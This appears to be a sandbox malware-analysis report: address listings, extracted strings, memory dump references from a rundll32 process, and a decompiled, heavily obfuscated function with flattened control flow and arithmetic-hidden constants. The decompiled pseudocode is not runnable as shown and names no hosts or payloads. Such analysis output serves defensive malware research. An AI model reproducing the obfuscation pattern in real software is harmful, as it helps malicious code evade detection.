0x0020a3b2
0x0020a3bd
0x0020a3c5
0x0020a3cd
0x0020a3d2
0x0020a3da
0x0020a3e5
0x0020a3f0
0x0020a3fb
0x0020a406
0x0020a411
0x0020a41c
0x0020a427
0x0020a42f
0x0020a434
0x0020a43c
0x0020a444
0x0020a44c
0x0020a460
0x0020a467
0x0020a472
0x0020a47d
0x0020a487
0x0020a492
0x0020a49d
0x0020a4a5
0x0020a4b0
0x0020a4be
0x0020a4c3
0x0020a4ce
0x0020a4d1
0x0020a4d5
0x0020a4da
0x0020a4e2
0x0020a4ea
0x0020a4f2
0x0020a4f7
0x0020a4ff
0x0020a507
0x0020a512
0x0020a51a
0x0020a525
0x0020a530
0x0020a538
0x0020a53d
0x0020a545
0x0020a54d
0x0020a558
0x0020a563
0x0020a56e
0x0020a57e
0x0020a582
0x0020a58a
0x0020a58e
0x0020a596
0x0020a59e
0x0020a5a6
0x0020a5ab
0x0020a5b3
0x0020a5bb
0x0020a5c6
0x0020a5d1
0x0020a5dc
0x0020a5e7
0x0020a5f2
0x0020a5fd
0x0020a609
0x0020a60c
0x0020a610
0x0020a618
0x0020a61d
0x0020a625
0x0020a638
0x0020a63f
0x0020a64a
0x0020a652
0x0020a657
0x0020a65c
0x0020a664
0x0020a66c
0x0020a679
0x0020a67d
0x0020a685
0x0020a68d
0x0020a695
0x0020a6a5
0x0020a6aa
0x0020a6b0
0x0020a6b5
0x0020a6bd
0x0020a6c5
0x0020a6ce
0x0020a6d3
0x0020a6dd
0x0020a6e2
0x0020a6e8
0x0020a6f0
0x0020a6fb
0x0020a706
0x0020a711
0x0020a719
0x0020a71e
0x0020a723
0x0020a72b
0x0020a733
0x0020a73b
0x0020a740
0x0020a748
0x0020a750
0x0020a758
0x0020a75d
0x0020a762
0x0020a76a
0x0020a776
0x0020a77b
0x0020a785
0x0020a78a
0x0020a790
0x0020a798
0x0020a7a0
0x0020a7ab
0x0020a7b6
0x0020a7c1
0x0020a7d3
0x0020a7d8
0x0020a7e9
0x0020a7ea
0x0020a7f1
0x0020a7fc
0x0020a807
0x0020a80f
0x0020a81a
0x0020a825
0x0020a830
0x0020a83b
0x0020a846
0x0020a854
0x0020a858
0x0020a860
0x0020a868
0x0020a872
0x0020a87d
0x0020a888
0x0020a893
0x0020a89b
0x0020a8a0
0x0020a8a5
0x0020a8ad
0x0020a8b5
0x0020a8c0
0x0020a8cb
0x0020a8d6
0x0020a8e1
0x0020a8ec
0x0020a8f7
0x0020a902
0x0020a90d
0x0020a918
0x0020a923
0x0020a92b
0x0020a936
0x0020a941
0x0020a955
0x0020a95a
0x0020a961
0x0020a96c
0x0020a977
0x0020a982
0x0020a989
0x0020a991
0x0020a99c
0x0020a9a4
0x0020a9ac
0x0020a9b1
0x0020a9b9
0x0020a9c9
0x0020a9cf
0x0020a9d7
0x0020a9df
0x0020a9e7
0x0020a9ef
0x0020a9f8
0x0020a9fd
0x0020aa03
0x0020aa0b
0x0020aa1e
0x0020aa1f
0x0020aa26
0x0020aa31
0x0020aa3c
0x0020aa44
0x0020aa4f
0x0020aa5a
0x0020aa65
0x0020aa79
0x0020aa80
0x0020aa92
0x0020aa99
0x0020aa9d
0x0020aa9d
0x0020aa9d
0x0020aaa1
0x0020aaa1
0x0020aaa4
0x0020aaa4
0x0020aaa4
0x0020aaaa
0x00000000
0x00000000
0x0020aab0
0x0020aab0
0x0020adbb
0x0020ae14
0x0020ae19
0x0020ae2d
0x0020ae32
0x0020ae38
0x0020aa9d
0x0020aa9d
0x0020aa9d
0x00000000
0x0020aa9d
0x0020aab6
0x0020aab6
0x0020aabc
0x0020ace5
0x0020aceb
0x0020adaa
0x0020adb1
0x00000000
0x0020acf1
0x0020acf1
0x0020acf7
0x0020ad88
0x0020ad8d
0x00000000
0x0020acfd
0x0020acfd
0x0020ad03
0x00000000
0x0020ad09
0x0020ad10
0x0020ad26
0x0020ad2e
0x0020ad64
0x0020ad69
0x0020ad6e
0x0020ad76
0x00000000
0x0020ad76
0x0020ad03
0x0020acf7
0x0020aac2
0x0020aac2
0x0020acac
0x0020acbb
0x0020acc2
0x0020acc9
0x0020acd1
0x0020acd2
0x0020acda
0x00000000
0x0020aac8
0x0020aace
0x0020ac86
0x0020ac8d
0x00000000
0x0020aad4
0x0020aada
0x0020ac01
0x0020ac02
0x0020ac0b
0x0020ac0d
0x0020ac29
0x0020ac2d
0x0020ac2f
0x0020ac4c
0x0020ac51
0x0020ac54
0x0020ac58
0x0020ac5a
0x0020b013
0x0020b014
0x0020b01b
0x0020b022
0x0020b041
0x0020b041
0x0020ac60
0x0020ac60
0x0020aa9d
0x0020aa9d
0x0020aa9d
0x00000000
0x0020aa9d
0x0020aa9d
0x0020ac5a
0x0020aae0
0x0020aae6
0x0020abcb
0x0020abcf
0x0020abd2
0x0020abd7
0x0020abde
0x0020abde
0x00000000
0x0020aaec
0x0020aaec
0x0020aaf2
0x0020b006
0x0020b006
0x0020b00c
0x0020abe2
0x0020abe2
0x00000000
0x0020abe2
0x0020aaf8
0x0020aaf8
0x0020ab0b
0x0020ab12
0x0020ab3b
0x0020ab4e
0x0020ab6c
0x0020ab71
0x0020ab85
0x0020ab8a
0x0020ab91
0x0020ab98
0x0020ab9c
0x0020aba0
0x0020aaa1
0x0020aaa4
0x0020aaa4
0x0020aaaa
0x00000000
0x00000000
0x0020aaaa
0x0020aaf2
0x0020aae6
0x0020aada
0x0020aace
0x0020aac2
0x0020aabc
0x0020b04a
0x0020b054
0x0020ae42
0x0020ae42
0x0020ae48
0x0020afef
0x0020aff1
0x0020b001
0x00000000
0x0020aff3
0x0020aff3
0x00000000
0x0020aff3
0x0020ae4e
0x0020ae4e
0x0020ae54
0x0020af59
0x0020af64
0x0020af69
0x0020af69
0x0020af6a
0x0020af94
0x0020af9b
0x0020afa0
0x0020afa3
0x0020afa8
0x0020afa9
0x0020afac
0x0020afaf
0x0020afaf
0x0020afaf
0x0020afb2
0x0020afbb
0x0020afbe
0x0020afc7
0x00000000
0x0020ae5a
0x0020ae5a
0x0020ae60
0x0020af41
0x0020af48
0x00000000
0x0020ae66
0x0020ae66
0x0020ae6c
0x0020af1a
0x0020af21
0x00000000
0x0020ae72
0x0020ae72
0x0020ae78
0x0020aef6
0x0020aefd
0x00000000
0x0020ae7a
0x0020ae7a
0x0020ae80
0x0020b02b
0x0020b02c
0x0020b033
0x0020b03a
0x00000000
0x0020ae86
0x0020ae86
0x0020ae8c
0x00000000
0x0020ae92
0x0020aeb5
0x0020aebd
0x0020aec2
0x0020aec7
0x0020aecf
0x00000000
0x0020aecf
0x0020ae8c
0x0020ae80
0x0020ae78
0x0020ae6c
0x0020ae60
0x0020ae54
0x00000000
0x0020ae48
0x0020aaa4
0x0020aaa1

Strings

m9, xrefs: 0020A61D
nXj, xrefs: 0020A014
C/, xrefs: 0020A76A
./, xrefs: 0020A492
tu, xrefs: 0020A706
25, xrefs: 0020A33C
Q[, xrefs: 0020A188
cA, xrefs: 0020A15A
p=4E, xrefs: 0020A8E1
q, xrefs: 0020A4DA
NS5, xrefs: 0020A750
KZ, xrefs: 0020A5DC
m, xrefs: 0020A10D
M#, xrefs: 0020A0EC
{, xrefs: 0020A893
S', xrefs: 0020A72B
%, xrefs: 0020A3BD
E, xrefs: 0020A991
#}, xrefs: 0020A507
=;, xrefs: 0020A102
5a, xrefs: 0020A5FD
"m, xrefs: 0020A860
w, xrefs: 0020A44C
dW, xrefs: 0020AA80
Z9, xrefs: 0020A427
jg, xrefs: 0020A165
Q, xrefs: 0020A7C1
<8, xrefs: 0020A134
j@}9, xrefs: 0020AE86
}=, xrefs: 0020A762
Lf, xrefs: 0020A625

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "m$#}$%$./$25$5a$<8$=;$C/$KZ$Lf$M#$Q[$Q$S'$Z9$cA$dW$j@}9$jg$m$m9$nXj$p=4E$tu${$}=$E$NS5$q$w
API String ID: 0-3061497230
Opcode ID: 3898f10f3a3a7d83696010010b41cc67dc983c0771cb8e416981b69d7bc2fcd1
Instruction ID: 02b18d6ae6f141b350b7b658c05374a85907b3c28d98fa818aeb087d9fc3fe48
Opcode Fuzzy Hash: 3898f10f3a3a7d83696010010b41cc67dc983c0771cb8e416981b69d7bc2fcd1
Instruction Fuzzy Hash: 4F82357151C3818BE378CF25C589B9BBBE2BBC4318F10891DE19A862A0DBB59559CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0020C769, Relevance: 24.4, Strings: 19, Instructions: 630
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0020C769(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				intOrPtr _v316;
				char _v320;
				intOrPtr _t666;
				intOrPtr _t667;
				intOrPtr _t672;
				void* _t679;
				intOrPtr _t680;
				intOrPtr _t687;
				intOrPtr _t689;
				intOrPtr _t693;
				intOrPtr* _t694;
				signed int _t706;
				intOrPtr _t707;
				void* _t712;
				intOrPtr _t718;
				void* _t758;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				intOrPtr _t785;
				signed int _t786;
				intOrPtr _t788;
				char _t793;
				void* _t795;
				void* _t797;

				_t694 = __edx;
				_push(_a40);
				_push(_a36);
				_v20 = __ecx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_a20 & 0x0000ffff);
				_v12 = 0x78501c;
				_v24 = 0;
				_v8 = 0;
				_t793 = 0;
				_v4 = 0;
				_t795 =  &_v320 + 0x30;
				_v232 = 0x7906;
				_t786 = 0xcd25e5e;
				_v232 = _v232 << 6;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 ^ 0x00000790;
				_v156 = 0xf83b;
				_v156 = _v156 >> 0xb;
				_v156 = _v156 ^ 0x0000000c;
				_v52 = 0x2ceb;
				_v52 = _v52 | 0xa5610ac4;
				_v52 = _v52 ^ 0xa5612e27;
				_v208 = 0x96db;
				_v208 = _v208 + 0xffffce2c;
				_v208 = _v208 | 0x71346f29;
				_v208 = _v208 ^ 0x7134ef2f;
				_v116 = 0x28a4;
				_v116 = _v116 + 0xffff342e;
				_v116 = _v116 ^ 0xffff1cd2;
				_v124 = 0xa3bc;
				_v124 = _v124 + 0xffffb3e2;
				_v124 = _v124 ^ 0x0040579e;
				_v132 = 0x4a92;
				_v132 = _v132 << 0xb;
				_v132 = _v132 ^ 0x02509000;
				_v140 = 0xcc93;
				_v140 = _v140 >> 0xd;
				_v140 = _v140 ^ 0x04000006;
				_v148 = 0xadf6;
				_v148 = _v148 >> 5;
				_v148 = _v148 ^ 0x0008056f;
				_v216 = 0xcf16;
				_v216 = _v216 ^ 0x2caffd24;
				_v216 = _v216 >> 8;
				_v216 = _v216 ^ 0x002cad32;
				_v296 = 0xe55e;
				_v296 = _v296 << 0x10;
				_v296 = _v296 + 0xffff79ea;
				_v296 = _v296 << 5;
				_v296 = _v296 ^ 0xabaf3c40;
				_v152 = 0xf9a;
				_v16 = 0;
				_v320 = 0;
				_v152 = _v152 * 0x3f;
				_v152 = _v152 ^ 0x8003d6e6;
				_v120 = 0x15;
				_v120 = _v120 << 2;
				_v120 = _v120 ^ 0x00000054;
				_v144 = 0x2eae;
				_v144 = _v144 + 0x3c19;
				_v144 = _v144 ^ 0x00006ac4;
				_v56 = 0xab01;
				_t773 = 0x5e;
				_v56 = _v56 / _t773;
				_v56 = _v56 ^ 0x00004cb8;
				_v104 = 0x2a8e;
				_t774 = 0x2c;
				_v104 = _v104 / _t774;
				_v104 = _v104 ^ 0x000033ed;
				_v292 = 0xd22b;
				_v292 = _v292 | 0xd3babaa8;
				_t775 = 0x50;
				_v292 = _v292 * 0x6c;
				_v292 = _v292 >> 7;
				_v292 = _v292 ^ 0x00a58d92;
				_v96 = 0x39fa;
				_v96 = _v96 / _t775;
				_v96 = _v96 ^ 0x00002d01;
				_v240 = 0xf5d4;
				_v240 = _v240 ^ 0x5b9fa071;
				_v240 = _v240 >> 3;
				_v240 = _v240 ^ 0x0b73efef;
				_v248 = 0x1311;
				_t776 = 0x42;
				_v248 = _v248 / _t776;
				_v248 = _v248 + 0x5e6d;
				_v248 = _v248 ^ 0x00004acc;
				_v88 = 0x907;
				_t777 = 0x6e;
				_v88 = _v88 * 0x48;
				_v88 = _v88 ^ 0x0002ff0c;
				_v36 = 0x8ec2;
				_v36 = _v36 / _t777;
				_v36 = _v36 ^ 0x00005772;
				_v260 = 0x4792;
				_v260 = _v260 << 0xd;
				_v260 = _v260 >> 0xb;
				_v260 = _v260 >> 4;
				_v260 = _v260 ^ 0x00006a86;
				_v224 = 0x4f89;
				_v224 = _v224 + 0xffff3059;
				_t778 = 0x21;
				_v224 = _v224 * 0x6e;
				_v224 = _v224 ^ 0xffc8e4d3;
				_v48 = 0x8858;
				_v48 = _v48 + 0x804a;
				_v48 = _v48 ^ 0x00017e21;
				_v312 = 0xd58c;
				_v312 = _v312 | 0x45747a0f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 / _t778;
				_v312 = _v312 ^ 0x00008646;
				_v300 = 0xadcd;
				_v300 = _v300 >> 8;
				_v300 = _v300 << 9;
				_v300 = _v300 >> 1;
				_v300 = _v300 ^ 0x00008fc4;
				_v268 = 0xd742;
				_t779 = 0x30;
				_v268 = _v268 / _t779;
				_v268 = _v268 + 0x61d9;
				_v268 = _v268 >> 4;
				_v268 = _v268 ^ 0x00000191;
				_v204 = 0x8d76;
				_v204 = _v204 | 0x1111a955;
				_v204 = _v204 << 5;
				_v204 = _v204 ^ 0x2235a282;
				_v64 = 0x8939;
				_v64 = _v64 + 0xffff3fc4;
				_v64 = _v64 ^ 0xffff80c7;
				_v276 = 0x72;
				_v276 = _v276 * 0x7d;
				_v276 = _v276 + 0xffff8366;
				_v276 = _v276 >> 9;
				_v276 = _v276 ^ 0x007facee;
				_v44 = 0xf34a;
				_v44 = _v44 + 0xffffbf38;
				_v44 = _v44 ^ 0x00008263;
				_v112 = 0x1dc0;
				_v112 = _v112 ^ 0x2c6551d7;
				_v112 = _v112 ^ 0x2c653ad3;
				_v228 = 0xc596;
				_v228 = _v228 ^ 0x9ca21630;
				_v228 = _v228 ^ 0x8f0fd5bf;
				_v228 = _v228 ^ 0x13ad7fff;
				_v196 = 0x8cfa;
				_v196 = _v196 >> 1;
				_v196 = _v196 ^ 0xfb4b109c;
				_v196 = _v196 ^ 0xfb4b1bca;
				_v236 = 0x2fd6;
				_v236 = _v236 << 7;
				_v236 = _v236 << 2;
				_v236 = _v236 ^ 0x005fedce;
				_v180 = 0x51a5;
				_v180 = _v180 ^ 0x4af0041f;
				_v180 = _v180 + 0xfffff3cf;
				_v180 = _v180 ^ 0x4af05e30;
				_v244 = 0x8950;
				_v244 = _v244 << 0xc;
				_v244 = _v244 | 0xbaabdb8a;
				_v244 = _v244 ^ 0xbabf869d;
				_v40 = 0xc836;
				_v40 = _v40 + 0xffff3474;
				_v40 = _v40 ^ 0xffff8af1;
				_v176 = 0x9727;
				_v176 = _v176 + 0xffffb8fc;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x00001e80;
				_v304 = 0x64c7;
				_v304 = _v304 + 0x56f7;
				_v304 = _v304 ^ 0x2de137fe;
				_v304 = _v304 + 0xaf99;
				_v304 = _v304 ^ 0x2de22ef8;
				_v308 = 0x2e06;
				_v308 = _v308 | 0x78777a1f;
				_v308 = _v308 * 0x79;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x1e0f1828;
				_v92 = 0xc9a2;
				_v92 = _v92 | 0xf3c29ea2;
				_v92 = _v92 ^ 0xf3c28d84;
				_v100 = 0xecbf;
				_v100 = _v100 + 0xffff0faf;
				_v100 = _v100 ^ 0xffffc0a5;
				_v192 = 0x95e0;
				_v192 = _v192 << 8;
				_v192 = _v192 << 9;
				_v192 = _v192 ^ 0x2bc00f3b;
				_v200 = 0x7c40;
				_t780 = 0x3a;
				_v200 = _v200 / _t780;
				_v200 = _v200 << 8;
				_v200 = _v200 ^ 0x000244df;
				_v272 = 0x7605;
				_v272 = _v272 << 5;
				_v272 = _v272 + 0xffffdeaf;
				_v272 = _v272 >> 0xb;
				_v272 = _v272 ^ 0x00001482;
				_v108 = 0x1c78;
				_v108 = _v108 + 0x3c33;
				_v108 = _v108 ^ 0x00006c40;
				_v280 = 0xd61a;
				_v280 = _v280 ^ 0xfb8fe6a7;
				_v280 = _v280 + 0x5fc;
				_v280 = _v280 | 0xbad3e440;
				_v280 = _v280 ^ 0xfbdf8156;
				_v288 = 0x89a2;
				_v288 = _v288 + 0xffff4641;
				_v288 = _v288 >> 0xc;
				_v288 = _v288 >> 0xd;
				_v288 = _v288 ^ 0x000071e8;
				_v252 = 0xe21c;
				_v252 = _v252 ^ 0x457ecc8f;
				_t781 = 0x67;
				_v252 = _v252 * 0x59;
				_v252 = _v252 ^ 0x28de7ded;
				_v84 = 0xe1;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x00001e3a;
				_v184 = 0xbeeb;
				_v184 = _v184 * 0x12;
				_v184 = _v184 + 0x8ae1;
				_v184 = _v184 ^ 0x000de1ad;
				_v68 = 0xfd10;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000036f7;
				_v76 = 0x1f03;
				_v76 = _v76 * 0x49;
				_v76 = _v76 ^ 0x000897f9;
				_v264 = 0xf0d9;
				_v264 = _v264 * 0x66;
				_v264 = _v264 + 0xffffb5cf;
				_v264 = _v264 + 0xea22;
				_v264 = _v264 ^ 0x0060dcb6;
				_v168 = 0xdfa9;
				_v168 = _v168 ^ 0x7c3d7298;
				_v168 = _v168 ^ 0xd2777362;
				_v168 = _v168 ^ 0xae4ad343;
				_v72 = 0x8534;
				_v72 = _v72 ^ 0x085524ca;
				_v72 = _v72 ^ 0x085595c2;
				_v136 = 0x90f3;
				_v136 = _v136 + 0xcfad;
				_v136 = _v136 ^ 0x00017ab2;
				_v220 = 0x7eee;
				_v220 = _v220 >> 3;
				_v220 = _v220 + 0xffffea23;
				_v220 = _v220 ^ 0xffffcf89;
				_v164 = 0x31cc;
				_v164 = _v164 | 0x82d13576;
				_v164 = _v164 >> 3;
				_v164 = _v164 ^ 0x105a14dc;
				_v284 = 0xab9f;
				_v284 = _v284 / _t781;
				_v284 = _v284 + 0xffff982b;
				_v284 = _v284 + 0xcf45;
				_v284 = _v284 ^ 0x000072b9;
				_v80 = 0x4458;
				_v80 = _v80 + 0xfa7e;
				_v80 = _v80 ^ 0x000168e1;
				_v128 = 0x89b9;
				_v128 = _v128 + 0xe32e;
				_v128 = _v128 ^ 0x00010bac;
				_v172 = 0xe617;
				_v172 = _v172 << 4;
				_v172 = _v172 + 0xb499;
				_v172 = _v172 ^ 0x000f5cd6;
				_v212 = 0x2b1d;
				_v212 = _v212 << 0x10;
				_t782 = 0x21;
				_v212 = _v212 * 0x7f;
				_v212 = _v212 ^ 0x63636a51;
				_v188 = 0x87b6;
				_v188 = _v188 | 0xa87ad713;
				_v188 = _v188 << 3;
				_v188 = _v188 ^ 0x43d6c05c;
				_v60 = 0x1ec0;
				_v60 = _v60 / _t782;
				_v60 = _v60 ^ 0x000042c8;
				_v256 = 0x1798;
				_v256 = _v256 ^ 0x8091dd24;
				_v256 = _v256 | 0xdc47dedf;
				_t783 = 0x19;
				_v256 = _v256 * 0x5d;
				_v256 = _v256 ^ 0x3a6c6c2e;
				_v160 = 0x6f3f;
				_v160 = _v160 / _t783;
				_t784 = 0x73;
				_t785 = _v20;
				_v160 = _v160 / _t784;
				_v160 = _v160 ^ 0x00005ad1;
				while(1) {
					L1:
					_t758 = 0x1fbed331;
					while(1) {
						_t797 = _t786 - _t758;
						if(_t797 <= 0) {
						}
						L3:
						if(_t797 == 0) {
							__eflags = E00205B79(_t785, _v20);
							_t786 = 0x1b724d6a;
							_t679 = 1;
							_t793 =  !=  ? _t679 : _t793;
							L13:
							_t666 = _v316;
							L14:
							_t707 = _v320;
							goto L1;
						}
						if(_t786 == 0xa0d70be) {
							__eflags = _t694;
							if(_t694 == 0) {
								_t718 = 0;
								__eflags = 0;
							} else {
								_t718 =  *_t694;
							}
							__eflags = _t694;
							if(_t694 == 0) {
								_t680 = 0;
								__eflags = 0;
							} else {
								_t680 =  *((intOrPtr*)(_t694 + 4));
							}
							E00218422(_v72, _v136, _v220, _a28, _t785, _t680, _t718, _v164, _t718);
							_t795 = _t795 + 0x1c;
							asm("sbb esi, esi");
							_t786 = (_t786 & 0x1873afa8) + 0x1b724d6a;
							goto L13;
						}
						if(_t786 == 0xcd25e5e) {
							_t786 = 0x25fbc0d1;
							while(1) {
								_t797 = _t786 - _t758;
								if(_t797 <= 0) {
								}
								goto L25;
							}
							goto L3;
						}
						if(_t786 == 0xdfc12f5) {
							_t666 = E00217955(_a20, _v228, _v196, _t707, _v236, _v180, _t707, _v244, _v40, _v144, _a12, _t707, _v32, _t707, _v176);
							_t795 = _t795 + 0x34;
							_v316 = _t666;
							__eflags = _t666;
							_t786 =  !=  ? 0x20246154 : 0x1e7ff602;
							goto L14;
						}
						if(_t786 == 0x1b724d6a) {
							E00207925(_v284, _t785, _v80, _v128);
							_t786 = 0x2cd2473d;
							L12:
							goto L13;
						}
						if(_t786 != 0x1e7ff602) {
							L45:
							__eflags = _t786 - 0x258a7eda;
							if(_t786 == 0x258a7eda) {
								L10:
								return _t793;
							}
							_t666 = _v316;
							continue;
						}
						E00207925(_v60, _v32, _v256, _v160);
						goto L10;
						L25:
						__eflags = _t786 - 0x20246154;
						if(_t786 == 0x20246154) {
							__eflags = _t694;
							if(__eflags == 0) {
								_t787 = _v16;
							} else {
								_push(_v308);
								_t667 = E0021889D(0x21c850, _v304, __eflags);
								_t787 = _t667;
								_v16 = _t667;
							}
							_t785 = E00201BD7(_v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v92, _v100, _v192, _v200, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v316, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _t705, _v272, _t787, _v108, _a24, _t705, _v280, _v288);
							_t706 = _v252;
							E00212025(_t706, _t787, _v84, _v184);
							_t795 = _t795 + 0x40;
							__eflags = _t785;
							if(_t785 == 0) {
								_t786 = 0x2cd2473d;
								L44:
								_t707 = _v320;
								_t758 = 0x1fbed331;
								goto L45;
							}
							_push(_t706);
							_v28 = 1;
							_t693 = E00216AFF(_v68, _v76, _v264,  &_v28, _v168, _t785);
							_t795 = _t795 + 0x18;
							_v28 = _t693;
							_t786 = 0xa0d70be;
							goto L13;
						}
						__eflags = _t786 - 0x25fbc0d1;
						if(_t786 == 0x25fbc0d1) {
							_push(0x200);
							_v24 = 0x200;
							_t788 = E00208736(0x200);
							_t712 = 0x200;
							__eflags = _t788;
							if(_t788 != 0) {
								_t687 = E0020F74E(_t712, _t788,  &_v24, _v96, _v240, _v248);
								_t795 = _t795 + 0x10;
								__eflags = _t687;
								if(_t687 == 0) {
									_t689 = E00210F0C(_v88, _t788, _t712, _v36, _v232, _t712, _v260);
									_t795 = _t795 + 0x14;
									_v320 = _t689;
								}
								E0020F536(_v224, _v48, _v312, _t788);
							}
							_t786 = 0x276816a4;
							goto L13;
						}
						__eflags = _t786 - 0x276816a4;
						if(_t786 == 0x276816a4) {
							_push(_t707);
							_t672 = E00205A52(_t707, _t707, _v300, _v268, _v204, _v64, _v120);
							__eflags = _t672;
							_v32 = _t672;
							_t786 =  !=  ? 0xdfc12f5 : 0x258a7eda;
							E0020F536(_v276, _v44, _v112, _v320);
							_t795 = _t795 + 0x24;
							goto L44;
						}
						__eflags = _t786 - 0x2cd2473d;
						if(_t786 == 0x2cd2473d) {
							E00207925(_v172, _t666, _v212, _v188);
							_t786 = 0x1e7ff602;
							goto L12;
						}
						__eflags = _t786 - 0x33e5fd12;
						if(__eflags != 0) {
							goto L45;
						}
						__eflags = E0021687F(_t785, _v156, __eflags) - _v52;
						_t758 = 0x1fbed331;
						_t666 = _v316;
						_t707 = _v320;
						_t786 =  ==  ? 0x1fbed331 : 0x1b724d6a;
					}
				}
			}

0x0020c777
0x0020c77c
0x0020c786
0x0020c78d
0x0020c794
0x0020c79b
0x0020c7a2
0x0020c7a9
0x0020c7aa
0x0020c7b1
0x0020c7b8
0x0020c7bf
0x0020c7c6
0x0020c7c7
0x0020c7c8
0x0020c7cd
0x0020c7da
0x0020c7e3
0x0020c7ea
0x0020c7ec
0x0020c7f3
0x0020c7f6
0x0020c7fe
0x0020c803
0x0020c808
0x0020c80d
0x0020c815
0x0020c820
0x0020c828
0x0020c830
0x0020c83b
0x0020c846
0x0020c851
0x0020c85c
0x0020c867
0x0020c872
0x0020c87d
0x0020c888
0x0020c893
0x0020c89e
0x0020c8a9
0x0020c8b4
0x0020c8bf
0x0020c8ca
0x0020c8d2
0x0020c8dd
0x0020c8e8
0x0020c8f0
0x0020c8fb
0x0020c906
0x0020c90e
0x0020c919
0x0020c921
0x0020c929
0x0020c92e
0x0020c936
0x0020c93e
0x0020c943
0x0020c94b
0x0020c950
0x0020c958
0x0020c963
0x0020c972
0x0020c976
0x0020c97d
0x0020c988
0x0020c993
0x0020c99b
0x0020c9a3
0x0020c9ae
0x0020c9b9
0x0020c9c4
0x0020c9da
0x0020c9df
0x0020c9e8
0x0020c9f3
0x0020ca05
0x0020ca0a
0x0020ca13
0x0020ca1e
0x0020ca26
0x0020ca33
0x0020ca36
0x0020ca3a
0x0020ca3f
0x0020ca47
0x0020ca5d
0x0020ca64
0x0020ca6f
0x0020ca77
0x0020ca7f
0x0020ca84
0x0020ca8c
0x0020ca98
0x0020ca9d
0x0020caa3
0x0020caab
0x0020cab3
0x0020cac6
0x0020cac9
0x0020cad0
0x0020cadb
0x0020caf1
0x0020caf8
0x0020cb03
0x0020cb0b
0x0020cb10
0x0020cb15
0x0020cb1a
0x0020cb22
0x0020cb2a
0x0020cb37
0x0020cb38
0x0020cb3c
0x0020cb44
0x0020cb4f
0x0020cb5a
0x0020cb65
0x0020cb6d
0x0020cb75
0x0020cb80
0x0020cb84
0x0020cb8c
0x0020cb94
0x0020cb99
0x0020cb9e
0x0020cba2
0x0020cbac
0x0020cbba
0x0020cbbd
0x0020cbc1
0x0020cbc9
0x0020cbce
0x0020cbd6
0x0020cbe1
0x0020cbec
0x0020cbf4
0x0020cbff
0x0020cc0a
0x0020cc15
0x0020cc20
0x0020cc2d
0x0020cc31
0x0020cc39
0x0020cc3e
0x0020cc46
0x0020cc51
0x0020cc5c
0x0020cc67
0x0020cc72
0x0020cc7d
0x0020cc88
0x0020cc90
0x0020cc98
0x0020cca0
0x0020cca8
0x0020ccb3
0x0020ccba
0x0020ccc5
0x0020ccd0
0x0020ccd8
0x0020ccdd
0x0020cce2
0x0020ccea
0x0020ccf5
0x0020cd00
0x0020cd0b
0x0020cd16
0x0020cd1e
0x0020cd23
0x0020cd2b
0x0020cd33
0x0020cd3e
0x0020cd49
0x0020cd54
0x0020cd5f
0x0020cd6a
0x0020cd72
0x0020cd7d
0x0020cd85
0x0020cd8d
0x0020cd95
0x0020cd9d
0x0020cda5
0x0020cdad
0x0020cdba
0x0020cdbe
0x0020cdc3
0x0020cdcb
0x0020cdd6
0x0020cde1
0x0020cdec
0x0020cdf7
0x0020ce02
0x0020ce0d
0x0020ce18
0x0020ce20
0x0020ce28
0x0020ce35
0x0020ce49
0x0020ce4e
0x0020ce57
0x0020ce5f
0x0020ce6a
0x0020ce72
0x0020ce77
0x0020ce7f
0x0020ce84
